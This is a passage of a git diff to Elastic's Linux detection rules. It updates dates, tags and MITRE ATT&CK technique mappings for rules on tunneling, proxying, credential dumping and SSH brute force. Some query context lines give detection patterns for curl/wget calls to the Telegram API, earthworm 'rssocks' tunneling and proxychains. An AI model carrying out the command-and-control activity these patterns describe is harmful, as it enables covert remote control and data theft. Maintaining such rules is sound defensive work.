Vulnerability", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Use Case: Vulnerability", "Tactic: Execution", "Data Source: Elastic Defend", "Resources: Investigation Guide"] type = "eql" query = ''' sequence by host.id with maxspan=10s @@ -119,13 +111,15 @@ sequence by host.id with maxspan=10s [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" -[[rule.threat]] -framework = "MITRE ATT&CK" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" [[rule.threat.technique]] id = "T1203" @@ -136,19 +130,3 @@ reference = "https://attack.mitre.org/techniques/T1203/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/command_and_control_curl_socks_proxy_detected.toml b/rules/linux/command_and_control_curl_socks_proxy_detected.toml index cfdde4aab58..62bb09e0ed4 100644 --- a/rules/linux/command_and_control_curl_socks_proxy_detected.toml +++ b/rules/linux/command_and_control_curl_socks_proxy_detected.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -125,9 +125,9 @@ Curl is a versatile command-line tool used for transferring data with URLs, ofte framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml index 8e5b77e396f..ebb3cfff1cb 100644 --- a/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml +++ b/rules/linux/command_and_control_git_repo_or_file_download_to_sus_dir.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint"] maturity = "production" -updated_date = "2025/09/16" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -117,9 +117,9 @@ sequence by process.entity_id, host.id with maxspan=10s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1071" -name = "Application Layer Protocol" -reference = "https://attack.mitre.org/techniques/T1071/" +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_ip_forwarding_activity.toml b/rules/linux/command_and_control_ip_forwarding_activity.toml index f810448aa2e..3357c9ea7ff 100644 --- a/rules/linux/command_and_control_ip_forwarding_activity.toml +++ b/rules/linux/command_and_control_ip_forwarding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -93,9 +93,14 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + +[[rule.threat.technique.subtechnique]] +id = "T1090.001" +name = "Internal Proxy" +reference = "https://attack.mitre.org/techniques/T1090/001/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_kubectl_networking_modification.toml b/rules/linux/command_and_control_kubectl_networking_modification.toml index 7eb417f4e4d..43c150612d1 100644 --- a/rules/linux/command_and_control_kubectl_networking_modification.toml +++ b/rules/linux/command_and_control_kubectl_networking_modification.toml @@ -4,7 +4,7 @@ integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "cloud_de maturity = "production" min_stack_comments = "Defend for Containers integration was re-introduced in 9.3.0" min_stack_version = "9.3.0" -updated_date = "2026/02/05" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -122,16 +122,16 @@ process.name == "kubectl" and ( [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" - [[rule.threat.technique]] id = "T1090" name = "Proxy" reference = "https://attack.mitre.org/techniques/T1090/" +[[rule.threat.technique]] +id = "T1572" +name = "Protocol Tunneling" +reference = "https://attack.mitre.org/techniques/T1572/" + [rule.threat.tactic] id = "TA0011" name = "Command and Control" diff --git a/rules/linux/command_and_control_linux_kworker_netcon.toml b/rules/linux/command_and_control_linux_kworker_netcon.toml index acd204dae9a..49fe7f35a5a 100644 --- a/rules/linux/command_and_control_linux_kworker_netcon.toml +++ b/rules/linux/command_and_control_linux_kworker_netcon.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/18" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/24" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -46,14 +46,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "new_terms" @@ -110,42 +103,20 @@ Kworker processes are integral to Linux systems, handling kernel tasks like inte [[rule.threat]] framework = "MITRE ATT&CK" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1014" -name = "Rootkit" -reference = "https://attack.mitre.org/techniques/T1014/" - [[rule.threat.technique]] id = "T1036" name = "Masquerading" reference = "https://attack.mitre.org/techniques/T1036/" +[[rule.threat.technique.subtechnique]] +id = "T1036.005" +name = "Match Legitimate Resource Name or Location" +reference = "https://attack.mitre.org/techniques/T1036/005/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1041" -name = "Exfiltration Over C2 Channel" -reference = "https://attack.mitre.org/techniques/T1041/" - -[rule.threat.tactic] -id = "TA0010" -name = "Exfiltration" -reference = "https://attack.mitre.org/tactics/TA0010/" - [rule.new_terms] field = "new_terms_fields" value = ["process.name", "host.id"] diff --git a/rules/linux/command_and_control_linux_proxychains_activity.toml b/rules/linux/command_and_control_linux_proxychains_activity.toml index c86530e3580..86f11516b7b 100644 --- a/rules/linux/command_and_control_linux_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -140,9 +140,9 @@ process.name == "proxychains" framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml index b4d383c26e2..0eb28ef7597 100644 --- a/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml +++ b/rules/linux/command_and_control_linux_ssh_x11_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -111,17 +111,7 @@ references = ["https://book.hacktricks.xyz/generic-methodologies-and-resources/t risk_score = 21 rule_id = "29f0cf93-d17c-4b12-b4f3-a433800539fa" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Command and Control", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Lateral Movement", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -134,14 +124,31 @@ process.parent.name in ("bash", "dash", "ash", "sh", "tcsh", "csh", "zsh", "ksh" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" reference = "https://attack.mitre.org/techniques/T1572/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1021" +name = "Remote Services" +reference = "https://attack.mitre.org/techniques/T1021/" + +[[rule.threat.technique.subtechnique]] +id = "T1021.004" +name = "SSH" +reference = "https://attack.mitre.org/techniques/T1021/004/" + +[rule.threat.tactic] +id = "TA0008" +name = "Lateral Movement" +reference = "https://attack.mitre.org/tactics/TA0008/" diff --git a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml index 6af65daf2cc..ccb257c05e8 100644 --- a/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml +++ b/rules/linux/command_and_control_linux_suspicious_proxychains_activity.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -170,9 +170,9 @@ process.name == "proxychains" and process.args : ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1572" -name = "Protocol Tunneling" -reference = "https://attack.mitre.org/techniques/T1572/" +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" [rule.threat.tactic] id = "TA0011" diff --git a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml index a32949a8673..5bc19c76442 100644 --- a/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml +++ b/rules/linux/command_and_control_linux_tunneling_and_port_forwarding.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/23" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -193,6 +193,11 @@ process where host.os.type == "linux" and event.type == "start" and event.action [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml index 971d4da2b10..31058ef855f 100644 --- a/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml +++ b/rules/linux/command_and_control_linux_tunneling_via_ssh_option.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/02/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -118,6 +118,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_potential_tunneling_command_line.toml b/rules/linux/command_and_control_potential_tunneling_command_line.toml index f0209e6a64a..4bba96a97cd 100644 --- a/rules/linux/command_and_control_potential_tunneling_command_line.toml +++ b/rules/linux/command_and_control_potential_tunneling_command_line.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/12" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -170,6 +170,11 @@ process.command_line regex """.*[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}:[ [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/command_and_control_telegram_api_request.toml b/rules/linux/command_and_control_telegram_api_request.toml index 7c6867e61ea..43f28f4633f 100644 --- a/rules/linux/command_and_control_telegram_api_request.toml +++ b/rules/linux/command_and_control_telegram_api_request.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -120,17 +120,12 @@ process.name in ("curl", "wget") and process.command_line like "*api.telegram.or [[rule.threat]] framework = "MITRE ATT&CK" - [rule.threat.tactic] - name = "Command and Control" - id = "TA0011" - reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat.technique]] +id = "T1102" +name = "Web Service" +reference = "https://attack.mitre.org/techniques/T1102/" - [[rule.threat.technique]] - name = "Application Layer Protocol" - id = "T1071" - reference = "https://attack.mitre.org/techniques/T1071/" - - [[rule.threat.technique.subtechnique]] - name = "Web Protocols" - id = "T1071.001" - reference = "https://attack.mitre.org/techniques/T1071/001/" +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/linux/command_and_control_tunneling_via_earthworm.toml b/rules/linux/command_and_control_tunneling_via_earthworm.toml index be519817da2..426efda183d 100644 --- a/rules/linux/command_and_control_tunneling_via_earthworm.toml +++ b/rules/linux/command_and_control_tunneling_via_earthworm.toml @@ -2,7 +2,7 @@ creation_date = "2021/04/12" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [transform] [[transform.osquery]] @@ -177,6 +177,11 @@ process.args : "-s" and process.args : "-d" and process.args : "rssocks" [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1090" +name = "Proxy" +reference = "https://attack.mitre.org/techniques/T1090/" + [[rule.threat.technique]] id = "T1572" name = "Protocol Tunneling" diff --git a/rules/linux/credential_access_collection_sensitive_files.toml b/rules/linux/credential_access_collection_sensitive_files.toml index 71d52ec71c9..2bd89455114 100644 --- a/rules/linux/credential_access_collection_sensitive_files.toml +++ b/rules/linux/credential_access_collection_sensitive_files.toml @@ -2,7 +2,7 @@ creation_date = "2020/12/22" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/02" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -153,24 +153,6 @@ Compression utilities like zip, tar, and gzip are essential for efficiently mana [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -186,6 +168,23 @@ id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.command_line", "process.parent.executable"] diff --git a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml index 417321d89b0..32c71e4856a 100644 --- a/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml +++ b/rules/linux/credential_access_collection_sensitive_files_compression_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -101,24 +101,6 @@ Containers are lightweight, portable environments used to run applications consi [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - -[[rule.threat.technique.subtechnique]] -id = "T1552.001" -name = "Credentials In Files" -reference = "https://attack.mitre.org/techniques/T1552/001/" - -[rule.threat.tactic] -id = "TA0006" -name = "Credential Access" -reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - [[rule.threat.technique]] id = "T1560" name = "Archive Collected Data" @@ -133,3 +115,21 @@ reference = "https://attack.mitre.org/techniques/T1560/001/" id = "TA0009" name = "Collection" reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1552" +name = "Unsecured Credentials" +reference = "https://attack.mitre.org/techniques/T1552/" + +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" + +[rule.threat.tactic] +id = "TA0006" +name = "Credential Access" +reference = "https://attack.mitre.org/tactics/TA0006/" diff --git a/rules/linux/credential_access_gdb_init_process_hooking.toml b/rules/linux/credential_access_gdb_init_process_hooking.toml index 646c05881fc..ef6dd41d452 100644 --- a/rules/linux/credential_access_gdb_init_process_hooking.toml +++ b/rules/linux/credential_access_gdb_init_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -113,11 +113,6 @@ id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.007" -name = "Proc Filesystem" -reference = "https://attack.mitre.org/techniques/T1003/007/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_gdb_process_hooking.toml b/rules/linux/credential_access_gdb_process_hooking.toml index af461be6f71..de89947a394 100644 --- a/rules/linux/credential_access_gdb_process_hooking.toml +++ b/rules/linux/credential_access_gdb_process_hooking.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/30" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -62,18 +62,7 @@ references = ["https://github.com/controlplaneio/truffleproc", "https://github.c risk_score = 21 rule_id = "66c058f3-99f4-4d18-952b-43348f2577a0" severity = "low" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Auditd Manager", - "Data Source: Crowdstrike", - "Data Source: SentinelOne", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Collection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Auditd Manager", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" @@ -87,19 +76,26 @@ process.args != "1" [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1005" +name = "Data from Local System" +reference = "https://attack.mitre.org/techniques/T1005/" + +[rule.threat.tactic] +id = "TA0009" +name = "Collection" +reference = "https://attack.mitre.org/tactics/TA0009/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1003" name = "OS Credential Dumping" reference = "https://attack.mitre.org/techniques/T1003/" -[[rule.threat.technique.subtechnique]] -id = "T1003.007" -name = "Proc Filesystem" -reference = "https://attack.mitre.org/techniques/T1003/007/" - - [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - diff --git a/rules/linux/credential_access_gh_auth_via_nodejs.toml b/rules/linux/credential_access_gh_auth_via_nodejs.toml index 1ab982a0861..ad32bc2cae0 100644 --- a/rules/linux/credential_access_gh_auth_via_nodejs.toml +++ b/rules/linux/credential_access_gh_auth_via_nodejs.toml @@ -2,7 +2,7 @@ creation_date = "2025/09/18" integration = ["endpoint", "crowdstrike"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -48,17 +48,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Data Source: Elastic Endgame", - "Data Source: Crowdstrike", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -69,11 +59,6 @@ process.name in ("bash", "dash", "sh", "tcsh", "csh", "zsh", "ksh", "fish") and [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1552" -name = "Unsecured Credentials" -reference = "https://attack.mitre.org/techniques/T1552/" - [[rule.threat.technique]] id = "T1528" name = "Steal Application Access Token" @@ -83,16 +68,3 @@ reference = "https://attack.mitre.org/techniques/T1528/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml index b4054ccf7f8..d3e1807cea8 100644 --- a/rules/linux/credential_access_kubernetes_service_account_secret_access.toml +++ b/rules/linux/credential_access_kubernetes_service_account_secret_access.toml @@ -2,7 +2,7 @@ creation_date = "2025/06/17" integration = ["endpoint"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -82,17 +82,7 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = [ - "Domain: Endpoint", - "Domain: Container", - "Domain: Kubernetes", - "OS: Linux", - "Use Case: Threat Detection", - "Tactic: Credential Access", - "Tactic: Discovery", - "Data Source: Elastic Defend", - "Resources: Investigation Guide", -] +tags = ["Domain: Endpoint", "Domain: Container", "Domain: Kubernetes", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -134,30 +124,22 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1528" +name = "Steal Application Access Token" +reference = "https://attack.mitre.org/techniques/T1528/" + [[rule.threat.technique]] id = "T1552" name = "Unsecured Credentials" reference = "https://attack.mitre.org/techniques/T1552/" -[[rule.threat.technique]] -id = "T1528" -name = "Steal Application Access Token" -reference = "https://attack.mitre.org/techniques/T1528/" +[[rule.threat.technique.subtechnique]] +id = "T1552.001" +name = "Credentials In Files" +reference = "https://attack.mitre.org/techniques/T1552/001/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1613" -name = "Container and Resource Discovery" -reference = "https://attack.mitre.org/techniques/T1613/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_manual_memory_dumping.toml b/rules/linux/credential_access_manual_memory_dumping.toml index d6f5ffe2135..1d2376ab2fb 100644 --- a/rules/linux/credential_access_manual_memory_dumping.toml +++ b/rules/linux/credential_access_manual_memory_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/25" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel", "auditd_manager"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -120,11 +120,6 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" -[[rule.threat.technique]] -id = "T1212" -name = "Exploitation for Credential Access" -reference = "https://attack.mitre.org/techniques/T1212/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml index 3cfe8812e89..fc9c5844bef 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_external.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -110,11 +110,6 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml index 020628dd4f9..ef52de06f44 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/21" integration = ["system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -106,11 +106,6 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" -[[rule.threat.technique.subtechnique]] -id = "T1110.003" -name = "Password Spraying" -reference = "https://attack.mitre.org/techniques/T1110/003/" - [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_password_spraying_attack.toml b/rules/linux/credential_access_potential_password_spraying_attack.toml index 711c7bd6fae..d29948322d0 100644 --- a/rules/linux/credential_access_potential_password_spraying_attack.toml +++ b/rules/linux/credential_access_potential_password_spraying_attack.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/24" integration = ["system"] maturity = "production" -updated_date = "2026/01/12" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -111,11 +111,6 @@ id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" -[[rule.threat.technique.subtechnique]] -id = "T1110.001" -name = "Password Guessing" -reference = "https://attack.mitre.org/techniques/T1110/001/" - [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml index 8f8c9f7c185..f8019adac53 100644 --- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml +++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2025/12/17" +updated_date = "2026/03/23" [rule] author = ["Elastic"] @@ -108,11 